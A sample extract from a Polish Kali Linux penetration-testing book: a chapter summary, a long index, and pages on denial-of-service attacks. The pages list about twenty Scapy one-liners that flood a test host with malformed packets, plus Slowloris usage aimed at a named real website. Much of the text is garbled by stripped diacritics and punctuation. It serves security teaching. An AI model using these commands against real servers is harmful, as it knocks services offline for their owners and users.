PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
